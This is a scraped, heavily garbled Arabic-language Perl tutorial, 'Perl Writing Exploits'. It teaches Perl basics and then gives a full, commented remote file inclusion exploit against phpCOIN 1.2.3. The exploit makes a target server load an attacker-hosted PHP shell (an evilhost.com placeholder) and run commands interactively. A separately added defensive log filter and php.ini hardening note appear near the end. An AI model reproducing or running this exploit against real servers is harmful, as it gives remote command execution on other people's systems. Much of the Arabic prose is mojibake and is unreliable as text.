Perl Writing Exploits - TechGig.com

www.t0010.com

Perl Writing Exploits


‫ ا ا  ا‬

 !" ‫  اق ظ‬ AlhambA ‫ ب‬.‫  ا‬/ ,‫*) ت ا‬+, http://www.sniper-sa.com/forums

)  ‫"! ا‬


‫‪ ::‬ا ‪::‬‬ ‫ال هـ! ـ ‪#‬ـ‪"  ,‬ـ! ـوره ‪o N‬ـ ا‪Y‬ـ& ص‬ ‫و] آ ‪S pq‬ا ‪r^ !" ,‬ـ ت اـ ‪ RIq‬واـ م أ‪t‬ـ ‪p‬‬ ‫ال ^‪@ A‬م ‪ u e‬آ‪ M‬أ‪ Zq‬ا ـ‪ ^ M1‬ـ ً ‪," ،‬ـ!‬ ‫‪  R%q‬ت ا‪ o‬ا‪>y‬ى ‪I" ،‬ـ‪ M‬ـ و‪,‬ـ ـ‪z‬ات ‪e‬ـ?‬ ‫ا‪>$‬ى ‪.‬‬ ‫"ــ ل " ــة ــ? ‪,e q‬ــ "‪,‬ــ! ‪#‬ــ‪  ,‬اــ ‪ l N‬و‪#‬ــ‪ ,‬‬ ‫ا‪ N #$‬ل‪.‬‬ ‫ــ ذا ^‪ I‬ــ‪ K‬ا‪#‬ــ =ل ا‪f‬ــات ‪S‬ــ ل ‪e‬ــ? {هــ ؟‬ ‫‪ ,q$‬ا [ة ^‪," K I‬ـ ا‪#$‬ـ =ل ‪YS‬ـ‪[ A‬ـ ا! ‪%70‬‬ ‫^‪ S K I‬ل‬ ‫وا‪S KA‬ـ ن اآ‪f‬ـ ا‪I,‬ـ @ ـ رون هـ‪b‬ة ا ـ ‪e‬ـ? {هـ ‬ ‫‪ KAS‬ا‪  ,# ,q‬ا ‪k‬ـ و‪#‬ـ‪  ,‬ا ـ‪ M‬وهـ! آ‪%‬ـ ء‬ ‫‪ ، MN S‬و^‪ zoY‬ا‪. aj " eAS MN‬‬ ‫ آـ ن اه  ـ إ ‪o‬ـ د ا‪f‬ـات "‪,‬ـ‪b‬ا ا …ـ ع اـ& ƒ‬ ‫ ‪b,S , I‬ة ا  ‪.‬‬


: ‫ ت "!  ال‬# #y‫ا‬ lk  M  ‫ † "! ال ^ ج‬qS b%Y !I ActiveStates's perl http://www.activestate.us

L] ‫ا ا‬b‫ ? ه‬a [

!&q ‫وا ‹ ً  ر‬ DzSofts Perl‫ا ا ر‬b‫ @م ه‬#‫ Œ@& ً ا‬q‫ا‬ www.dzsoft.com

L] ‫ا ا‬b‫ ه‬u e ‘o^ ‘I%‫ @م ا‬#‫او ا‬

"perl Editor "Mk o‫ "! ا‬K ‫ اآ‬# Y^ l ‫او اذا‬ .pl ‫ ن‬I ‫ "! ال‬o qS ‫وا اد‬  o‫ ا‬e ” !‫ † "! ال وه‬qS ‫ اول‬K IY "Hello World ‫ة‬,1‫ا‬ :‫آد‬

#!/usr/bin/perl -w
print "Hello World\n";

filename.pl l#$‫ ا‬b,S aZ%[‫ا‬ : ‫ د‬I‫Œح ا‬ ‫ ل‬S † qS S I  ‫ اا‬#!/usr/bin/perl MN A ً  e‫ و‬. šr@‫ ه    šآ ? ا‬-w k ‫ ا‬q r>‫ أ‬K^ 


›] ^ ?e ‫ ء "! ) ; (  @ ال‬r>‫ون ا‬S M1 ‫و‬ . œ@‫ا ا‬b‫ ه‬u e ‫ااءة‬  k r#

"\n"

a ‫ت ا>ى‬$ [ ‫ة‬b‫وه‬

\n    NewLine
\r    Return
\t    Tab
\f    Form Feed
\b    Backspace
\v    Vertical Tab
\e    Escape
\a    Alarm
\L    Lowercase All
\l    Lowercase Next
\U    Uppercase All
\u    Uppercase First

>‫ ل ا‬f #!/usr/bin/perl -w print "Hello\tWorld\n\a";

‫ ن‬I^ ‫ ]! ا  ت  ات ا‬S Mf ‫ "! ال‬b‫وآ‬ ‫& ص أو أر] م‬q ‫? ^ ى‬I ‫ و‬،  ]¡ ‫ أو‬j‫دا‬ "$".‫Œ رة‬$ S ‫ف‬N^‫و‬ ! ‫ ل ا‬f‫Œ ه ا‬

#!/usr/bin/perl -w
$Hello = "Hello World\n";
print $Hello;


!" ‫ة‬fIS ‫ @م‬A^ !‫ @ام )' '( وه‬#‫ ا‬YI ‫و‬ ‫ " ت‬%&‫ا‬ ¥q ‫ آـ‬,Z^ !," '\n' Me ?I $ ,YS ‫ق‬%‫ا‬ DOT ‫ @ام‬# S ¥q L ¥q ›‹^ ‫ ان‬YI ‹ ‫وا‬

#!/usr/bin/perl -w
%color = (apple => "red", banana => "yellow");
print $color{apple}."\n".$color{banana};


: Conditionals ‫ ل‬f b>šq ,,% ‫ط‬1‫أدوات ا‬ ‫ ك‬# Lj k { ‫ إذا آ ن‬، ‫ ح‬%^ ,S ‫ة‬oŒ [‫ أ‬k‫ و‬ Lj k ‫ [ واذا  زال‬%^ M‫šآ‬S Lj k ‫ وإذا آ ن‬، ‫ة‬o1‫ا‬ ، L1 ? M‫ šآ‬MZ#‫ و‬q ¶ ‫ وا[ة‬M‫ آ‬S .‫ة‬o1‫ ك ا‬S aYrS ‫وإذا ا ¾ت‬ :&‫ا‬

if ( Logical ) {
    some command
}

Example:

#!/usr/bin/perl -w
$i = 1;
if($i == 1) {
    $i++;             #Increment by 1
    print $i . "\n";  #Prints 2 because the variable $i's condition was true
    #If $i was any other number it wouldn't print anything.
}

i  ‫ › ا‬N S ‫ ل اء‬f‫ا‬ i=1  ‫  اذا آ ن ا‬e r 1 ! ‫ ا‬rA‫ "! ا‬l¶ † q‫@ج ? ا‬# ‫ { ذ‬، M>‫اد‬ 2  ] Nr ‫ و‬1 a ›Z l¶ ‫ ا وف‬string !" ‫ط‬1‫ @م ادوات ا‬A^ ‫? ان‬I ‫و‬ &Y‫ا‬


Example:

#!/usr/bin/perl -w
$i = 'Hello';
if($i eq 'Hello') {
    print "Hello!\n";
} else {
    print "The variable (i) doesn't equal the correct string!\n";
}

. ‫ط‬1‫ ¨ ا‬l ‫ ه اذا‬YN Else " ‫ ا‬M#=A‫? ا‬S q‫ا ر‬

eq    equality
ne    inequality
lt    less than
gt    greater than
le    less than or equal
ge    greater than or equal

: User Input ‫ @م‬A‫د> ل ? >=ل ا‬²‫ا‬ ‫ @م‬A‫ ? ا‬K r ‫ة‬f  ‫ =ل‬#‫ ا‬S ‫ آ‬Ye ‫ @م‬A ‫و‬ ‫ =ل‬#$‫ ا‬M1  ً=f ، ¥q ‫إد> ل ] أو‬ .‘ N M 1^ !I ‫ ل‬N #$‫ ا‬S IS ‫ @م‬A‫" م ا‬


:‫ة ”ق =د> ل‬e ‫ ك‬Y‫وه‬

STDIN Method ً$‫أو‬ ‫ ت‬q   ‫  اد> ل‬e !‫ه‬

Example:

#!/usr/bin/perl -w
#STDIN Method
print "Hello my name is AlhambA, what is your name?: ";
$L1 = <STDIN>;
chomp $L1;
print "Nice to meet you $L1!\n";

NS ! ‫   وف ا‬o‫ ا‬rA‫ف ا‬b S !YN^ :chomp . ‫ا‬

: ARGV@ Method !‫ =د> ل ه‬q f‫  ا‬r‫ا‬  ‫ د‬e " %& pA ‫ة‬b‫ه‬ ‫ > رات‬u e ‫ @م‬A‫ ا‬L‹^ ‫ ان‬YI ‫ة‬b,S : ARGV@ :‫ ل‬f perl sploit.pl www.somesite.com /forums/ 1

‫ل‬N^ ‫? ان‬I ‫ة ا@ رات‬b‫ ه‬Lk ( perl sploit.pl ) ‫ا‬e 


ARGV@ r S ‫ @م ا@ رات‬Aq  ‫و] ت‬$‫ ا‬K {‫"! ا‬

#!/usr/bin/perl -w
if(@ARGV !=2) {
    print "Usage: perl $0 \n";
    exit;
}
($name, $num) = @ARGV;
print "Hello $name & your number was: $num!\n";

b%Y‫ا‬file.pl › ‫ ا‬l#‫ ا‬b>¾  ‫ا ا‬b‫ @م ه‬A $0 . k@‫  ت ا‬N‫  "! ا‬e ” l ‫[  ً و‬

uA^ ! ‫ ا‬module ‫ @ام‬# S f f‫  ا‬r‫ا‬ :GetOpt

#!/usr/bin/perl -w
#GetOpt STD module
use Getopt::Std;
getopts (":b:n:", \%args);
if (defined $args{n}) {
    $n1 = $args{n};
}
if (defined $args{b}) {
    $n2 = $args{b};
}
if (!defined $args{n} or !defined $args{b}){
    print "Usage: perl $0 -n Name -b Number\n";
    exit;
}
print "Hello $n1!\n";
print "Your number was: $n2\n";
print "Visit www.SnIpEr-SA.com today!\n\n";

k ‫ ا‬KN& S R Getopt ‘ A‫ ا‬M ‫ ء ا د‬e #‫ ا‬Ã f‫ ا‬rA‫"! ا‬


‫ @ام‬#‫ وا‬، b,-n- ‫=م‬ey‫ ا‬, getopts LS‫ اا‬rA‫و"! ا‬ %argsl,Y z@  ‫ ش‬,‫ا‬ n- ‫=م‬N‫ د ا‬k  ‫  ل اذا آ ن‬Y‫ ه‬R @‫ ا‬rA‫و"! ا‬ ، n1 ‫  ت "! ا‬N‫ن ا‬z> ‫ دس‬A‫ ا‬rA‫"! ا‬ .‫ د‬k  n-‫=م‬N‫ اذا آ ن ا‬$‫ ا‬$‫ا ا‬b‫ ه‬u‫ ا‬M> ? b-‫=م‬N‫ ا‬L ‫!ء‬1‫ ا‬R%q‫و‬ { ‫ط اذا آ ن‬1‫

د ا‬Y‫ ه‬1e ‫ ا دي‬rA‫و"! ا‬ ‫=م‬ey‫ د ? ا‬k  .aĔ > ‫ وا[ة‬a [ !" $‫ ا‬j t , ‫آ‬: or ‫ ن‬I Ye y‫ ا‬exit  N  S † q‫ و  ¨ ا‬M># !" !] ‫ ا‬Lr ‫ و‬، ‫ ا@ رج‬u‫ ا‬z%A" ?"N ?=N‫ا‬ .‫ ل‬f‫ا‬ GetOpt" ‫ ل‬N # S Y   ‹%‫  ا‬r‫ ن ا‬I #‫و‬ module ‫ @ام‬#$‫ ا‬M,# o qS ‫ ن‬I ‫ ان‬Ko

: Loop  ‫ر آ د‬I  % ‫ار ه‬I ‫ا‬ !" e o !," ، ‫ ااءة‬M,# ," ‫ د‬I‫ ]اءة ا‬YI

. ‫ د‬I‫ا ا‬b‫ه‬

#!/usr/bin/perl -w
#Loop Tutorial
#www.SnIpEr-SA.com
#Join Us TODAY!
##################################
#FULLY Commented#
##################################
#While Loops
#Format
# while (Comparison) {
#     Action
# }
#While loops will loop while the comparison is true, if it changes to false,
#it will no longer continue to loop through its set of action(s).
$i = 1;
while($i

‫ ك دوال‬Y‫ وه‬%1  S  ƒA M ‫ا ا د‬b‫ه‬ ‫ ”ق‬b‫وآ‬ !‫اوال ه‬

md5($data,...)
md5_hex($data,...)
md5_base64($data,...)

md5($data,...)
This function computes the MD5 digest of the data and returns it in binary form, 16 bytes long.

md5_hex($data,...)
Same as the previous one, but returns the digest in hexadecimal form. The result is 32 characters long and contains only '0'..'9' and 'a'..'f'.

md5_base64($data,...)
Same as the previous one, but returns the digest as a base64 string. The result is 22 characters long and contains only 'A'..'Z', 'a'..'z', '0'..'9', '+' and '/'.

Example:

use Digest::MD5 qw(md5_hex);
print "Digest is ", md5_hex("foobarbaz"), "\n";

‫ا ا@ج‬b‫وه‬ Digest is 6df23dc03f9b54cc38a0fc1483df6e21


Digest::MD5 ?e ‫œ ث‬S‫ا اا‬b‫ه‬ http://search.cpan.org/~gaas/Digest-MD5-2.36/MD5.pm

Y,  GET K r ‫ د‬Nq ‫ ت‬q S ‫ة‬e ] u e GET K ” S ‫ م‬Y# ‫ ل‬f‫ا ا‬b‫"! ه‬ LWP UserAgentM ‫ ا د‬L ," ,Y z@^‫ و‬Md5

#!/usr/bin/perl
# Md5 Database Filler
# Version 1.0, Add Word Manually
# www.SnIpEr-SA.com
# Modules needed : LWP (User Agent), Digest (MD5)
# Download + INSTALL md5 digest module
use LWP::UserAgent;           # Calling our LWP Useragent module
use Digest::MD5 qw(md5_hex);  # Calling our Digest MD5 module (Install {if you need it})
$brow = LWP::UserAgent->new;  # Our new useragent defined under the variable $brow
while(1) {  # Just a simple while loop that will run the program continuously instead of just 1 time
    print "Word to add: ";
    $var = <STDIN>;
    chomp ($var);
    $seek = "http://md5.rednoize.com/?q=$var&b=MD5Search";
    # get() always returns a response object, so test is_success to detect a failed request
    $brow->get( $seek )->is_success or die "Failed to Send GET request!\n";
    print "$var" . " : " . md5_hex("$var") . " was added to database " . "\n";
} # End of the while loop
# To test if it worked go to http://md5.rednoize.com/ and search your md5(hex) hash given to you
# It should crack :)
# This was a simple example of a get request executed on a server


LWP (User M‫ ء ا د ــ‬e ‫ــ‬#‫ إ‬l ‫ــ ل ــ‬f‫ا ا‬b‫" ـ! ه ـ‬ .? ‫ـ‬f‫ و ا‬LS A‫ اـ‬rA‫"ـ! اـ‬Agent), Digest (MD5) !" ,N…‫ ة وو‬k useragent Me L# ‫ ا‬rA‫و"! ا‬ $brow . ‫ا‬ .!j ,q $ ‫ار‬I^ Me ! ‫وا‬ ‫ـ ت‬q ‫ـة ا‬e ] œ‫ـ‬S‫ـ ان را‬Ye ‫ـف‬N $seek ‫و"ـ! ا ـ‬ .‫ـة‬e ‫ "ـ! ا‬a‫ي اد> ـ‬b‫ اـ‬l#$‫ن ا‬z@# Y‫ ه‬urN‫ا‬ u‫ ـ‬e get K‫ ـ‬r‫ ا‬b%Y‫ـ‬# ƒ%&‫ ا ـ ! ا ـ‬rA‫و"! ا‬ K‫ ” ــ‬S š‫ــ‬r> ‫ واذا آــ ن [ــث‬$seek ‫ــف‬N‫ا ــ ا‬ šr@‫  ا‬#‫ ر‬M## b‫ وآــ‬a‫ي اد> ــ‬b‫ اــ‬l‫ــ‬#$‫ــ ا‬e ” l ‫>ــ ــ‬$‫و"ــ! ا‬ . RI,‫ا ا‬S %1 ‫ا‬ L] ‫ ا‬u‫ ا‬K‫ اذه‬l#$‫واذا ارت ان ^ šآ ? ا… " ا‬ http://md5.rednoize.com/

‫ ش‬,‫ ا‬L ‘‫ ا‬#‫ و‬l#$‫? ا‬e à S‫و‬

Sockets


IO M‫ـ ت   د ـ‬# #$‫ ا‬b> Y# ‫ء‬zo‫ا ا‬b‫ "! ه‬RS ‫ا‬ Socket INET ‫( وهـ‬Input/Output) ‫>ـاج‬$‫د>ـ ل وا‬$‫ا‬ ‫ =ات‬#‫ @م "! ا‬A ‫و‬

IO Socket INET module RS ‫@م ا‬A^‫و‬، ‫ ء‬1qÌ  e % ‫ ا‬t YN‫ ا‬z,o  AF_INET ?‫او‬ ‫ ل‬f‫ا ا‬b‫"! ه‬ 80 ‫ ا رت‬u e ip u e ‫œ =^& ل‬AS R ‫ ء‬1Y# #!/usr/bin/perl use IO::Socket; # M ‫ ا د‬ue A IO Socket print "An IP to connect to: "; $ip = ;#‘‫اآ‬b‫! "! ا‬S ‫ن ا  اي‬z@# chomp($ip); $i=1; while($i new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"Couldn't connect!\n"; #Proto or Protocol (TCP/UDP) Y@ #‫ ا‬Y‫ ه‬tcp #PeerAddr or Peer Address M ‫@م‬A^ ip print "Connected!\n"; $i++; }

SQL injection exploits !" MN A^ M ‫ا ا د‬b‫ه‬ ‫ ن‬k‫ ? ا و‬I  b‫وآ‬ . ¨" Sockets ?e ‫ ك آ ب ث‬Y‫وه‬


Writing an Exploit (RFI (Remote File Include) u e ‫ ن‬I # !‫وه‬ phpCOIN 1.2.3 .† qS !" ‫ة‬f‫ا‬ http://milw0rm.com/exploits/2254 www.site.com/coin_includes/constants.php?_CCFG[_PKG_PATH_I NCL]=SHELL?&cmd=COMMAND

R ," ‫ آ د‬M‫ آ‬l,"‫ د ا‬I‫ ا‬l,%^ !I aA^ l^ ‫ن‬Î‫  ا‬e KNt Y‫ { وا…ƒ ه‬," ‫ة‬I% u‫ د ا‬I‫ ا‬ÏAq‫ا‬ #!/usr/bin/perl # http://milw0rm.com/exploits/2254 # # phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability # # Vulnerability found by TimQ # # Coded Exploit By Warpboy # use LWP::UserAgent; # We call our module #Store our user inputted information into variables # [=&‫ @  ر ا‬,@ Aq u ‫ف ا ات ا>  ا‬NY# ‫ ل‬N #$ S $site = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shellsite) { usg() # If the Url is invalid jump to the usg subrountine ‫اذا‬ b%Y# ƒ t ‫ آ ن‬usg subrountine ‫ =ل‬#$‫ ا‬M%#‫ "! ا‬L]‫وا‬ M 1# ‫ط‬1‫ ذ ا‬NS l¶ } header(); # Run through contents in the header subrountine b‫ وآ‬header subrountine ‫ء‬zo‫ "! ا‬b%Y# ‫ون Œط‬S ue A # ‫ =ل‬#$‫ ا‬M%#‫ا‬


#---------------------------------------------------------# Some loops to give us the ability to continue to use more than one command on the server. # Without these we would have to re-start the exploit for each command # "A‫ ا‬u‫ ء اوا ا‬re‫ ار "! ا‬#$‫ ا‬Lr # ‫  ب‬r#‫ ا‬S b%Y^ ‫ ء‬r>$‫ ا‬u [‫ † و‬q‫ ا‬b%Y^ Ye œ" [‫ ا وا‬R‫و‬ !" Y‫ =ل ? ا‹ ر‘ ا> ل ه‬#$‫ ا‬b%Y^ !‫ ار  آ‬# S  ‫ ا‬while Y e Y‫ وه‬while() == while(1) b%Y^ ‫اي‬ ‫ اررررر‬# S while() { print "[shell] \$"; while() # Recognize STDIN as a user input method, while() basically states that while your taking user input for the command, do the following. { # ‫ه‬b%Y^ ‫وا ااد‬$‫ ا‬Y‫ ه‬M>Y# $cmd=$_; #@_ :the argument passed to sub routine chomp($cmd); #Chomps the newline off the user inputted command #--------------------------------------------------------# Y "N Ye LWP Useragent module % Aq ‫ د‬I‫ا ? ا‬b,S ^= #‫ ا‬,Y MN^ !I‫  و‬N%‫‘ ا‬f‫? ا‬ $xpl = LWP::UserAgent->new() or die; #Defines the variable $xpl as a new useragent $req = HTTP::Request>new(GET=>$site.'/coin_includes/constants.php?_CCFG[ _PKG_PATH_INCL]='.$shellsite.'?&'.$shellcmd.'='.$cmd)o r die "\n\n Failed to Connect, Try again!\n"; #K r‫ف ا‬N# get ‫ ا& ب‬L] ‫ ا‬u‫ة ا‬f‫ ا‬M# ‫و‬ # ‫ ا‬$req K r‫ ا‬b%Y get L] ‫ @م اد> ل ا‬A‫ ا‬u e‫و‬  ‫ ا& ب "! ا‬$site .‫ة‬f‫ ا‬L] ‫ ا‬u e ¨r l¶ #$shellsite where the php backdoor is located, is the $shellcmd (php shell command variable) and $cmd variable which was the user #$shellcmd inputted command to execute on the server with the php backdoor. The final url


# Would look like www.site.com/coin_includes/constants.php?_CCFG[_PKG _PATH_INCL]=SHELL?&cmd=COMMAND # # l ‫ وا[ و‬MIŒ !" ‫ د†  ات‬MN # ‘b‫ ه‬a #=A‫ا‬  ‫ "! ا‬,o‫ د‬$req $res = $xpl->request($req); # ‫ ا‬$res K r‫ ا‬b%Y get ? Lk A# †‫وا ي ا‬ K r‫ ا‬get  ‫ن "! ا‬z@ ‫ و‬$info # The response of the server to the GET request we sent is stored in the $info variable # K r‫ ا@ دم ? ا‬Ko A# get  ‫ "! ا‬,qz@ ‫ و‬, # ‫و‬ $info $info = $res->content; $info =~ tr/[\n]/[ê]/; #---------------------------------------------------------# ? ‫ دة‬N‫ ا‬Y   @^ u ‫وط ا‬1‫ ? ا‬e o ‘b‫ه‬ K r‫š ا‬r>‫ ا‬get r> ‫ @م او‬A‫ ? اد> ل ا‬r@‫=ً اذا آ ن ا‬f !" r> Y ‫=  ل‬f L] ‫ "! ا‬r@‫ "! او ا‬r@‫ او ا‬$‫"! ا‬ aS Y] ‫ي‬b‫ ا‬r@‫" ا‬N M,A‫ ن ? ا‬I uI ‫^& ل‬$‫ا‬ #Simple conditional if (!$cmd) { print "\nEnter a Command\n\n"; $info =""; } #Tests to see if there was a connection failure or the command failed #šr> $‫š او ا‬r> ‫^& ل‬$‫ @  اذا آ ن ا‬Y‫ه‬ elsif ($info =~/failed to open stream: HTTP request failed!/ || $info =~/: Cannot execute a blank command in /) { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n"; exit; } # Another ElseIf, this is used incase the command is invalid like if you typed "asdfjasdf" as a command # Y‫ ه‬ElseIf =f   t { ‫وا‬$‫ ا‬pN” ‫" اذا‬asdfjasdf" elsif ($info =~/^.Warning/) { print "\nInvalid Command\n\n";


}; #---------------------------------------------------------------# !," ‫ =ل‬#=   ‫ او …و‬# #‫ د ا‬I‫ ‘ ? ا‬r@‫‘ ا‬b‫ه‬ r‫‘ ا‬f‫ دة " ا‬k  ‫ اذا آ ن‬L]   † q‫^ @ آ د ا‬  e # b ^" ‫ ث   ى‬# ‫ د‬N ‫" اذا آ ن ا ى‬Warning" l¶ ‫ † @ج‬q‫ ا‬exits !YN^ u ‫‘ " ا‬f‫ ا‬k ^$ ?N‫ ا‬L] ‫ا‬ if($info =~ /(.+).Warning.(.+).Warning/) { $final = $1; $final=~ tr/[ê]/[\n]/; print "\n$final\n"; last; } #---------------------------------------------------------------#‘b‫ =ل وه‬#$‫ ا‬u e ‫

ي‬lA‫ا ا‬b‫ ه‬else MI !‫ه‬ MI  S A‫وط ا‬1‫ا‬ else { print "[shell] \$"; } # end of else } # end of while() } # end of while last; #Sub-Rountines #The end of the code is our sub rountine "header" used earlier in the exploit sub header() { print q{ ++++++++++++++++++++++++++++++++++++ ++++++++++ phpCOIN 1.2.3 -- Remote Include Exploit Vulnerablity found by: TimQ Exploit coded by: Warpboy Original PoC: http://milw0rm.com/exploits/2254 ++++++++++++++++++++++++++++++++++++ ++++++++++ }


} #-----------------------------------------------------------#This is just our "usg" sub-rountine and a simple exit if all the code is bypassed due to errors ect sub usg() { header(); print q{ ==================================== ================================== Usage: perl sploit.pl - Path to site exp. www.site.com - Path to shell exp. www.evilhost.com/shell.txt - Command variable for php shell Example: perl C:\sploit.pl http://www.site.com/phpCOIN/ ==================================== =================================== }; exit(); } #-----------------------------------------------------------
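
Added example, not part of the original tutorial and not the exploit authors' code: a defender-side Perl filter that flags access log lines in which a query parameter such as _CCFG[_PKG_PATH_INCL] is set to a remote URL, which is the request shape the script above sends. The log lines, the find_rfi_attempts and url_decode names and the return_url allow-list entry are constructed for illustration, and the common/combined log format is assumed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Parameters that legitimately carry URLs (constructed allow-list).
my %URL_PARAM_OK = map { $_ => 1 } qw(return_url);

# Decode %XX escapes so encoded brackets and schemes still match.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Return [line_no, client, param, value] for each query parameter whose
# value begins with a remote scheme. Expects common/combined log format.
sub find_rfi_attempts {
    my @hits;
    my $n = 0;
    for my $line (@_) {
        $n++;
        next unless $line =~ m{^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"};
        my ($client, $uri) = ($1, $2);
        my (undef, $query) = split /\?/, $uri, 2;
        next unless defined $query;
        for my $pair (split /[&;]/, $query) {
            my ($name, $value) = map { url_decode($_) } split /=/, $pair, 2;
            next unless defined $value && !$URL_PARAM_OK{$name};
            push @hits, [$n, $client, $name, $value]
                if $value =~ m{^\s*(?:https?|ftp)://}i;
        }
    }
    return @hits;
}

# Constructed sample log lines (reserved documentation addresses and names).
my @sample = (
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://shell.example/s.txt?&cmd=COMMAND HTTP/1.1" 200 90',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /coin_includes/constants.php?_CCFG%5B_PKG_PATH_INCL%5D=hTTp%3A%2F%2Fshell.example%2Fs.txt%3F HTTP/1.1" 200 90',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /login.php?return_url=https://www.example.org/home HTTP/1.1" 302 0',
);

for my $hit (find_rfi_attempts(@sample)) {
    my ($n, $client, $name, $value) = @$hit;
    print "line $n: $client sets $name to remote URL $value\n";
}
```

On the server side, the include itself is closed off by setting allow_url_include to Off in php.ini and by never building an include path from a request variable.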


 ,Y‫ا‬ K{ ,Ó !" ‫ ء‬e‫ ا‬$‫ ا‬lIY ‘ kq  Ô‫ ور[ ا‬lI e ‫=م‬A‫وا‬ AlhambA l‫ا> آ‬ :M ‫ا‬ [email protected] [email protected]

‫ "!  ال‬L# ‫و‬ http://www.cpan.org http://www.securitydb.org/forum/ http://www.programmingtutorials.com/perl.aspx http://www.pageresource.com/cgirec/index2.htm http://www.cclabs.missouri.edu/thing...erlcourse.html http://www.ebb.org/PickingUpPerl/pickingUpPerl_toc.html http://vsbabu.org/tutorials/perl/ http://www.freeprogrammingresources.com/perl.html http://www.thescripts.com/serverside...uru/page0.html http://www.perl.com/pub/a/2002/08/20/perlandlwp.html http://www.perl.com http://www.perlmonks.org/index.pl?node=Tutorials www.google.com

Ô  S l^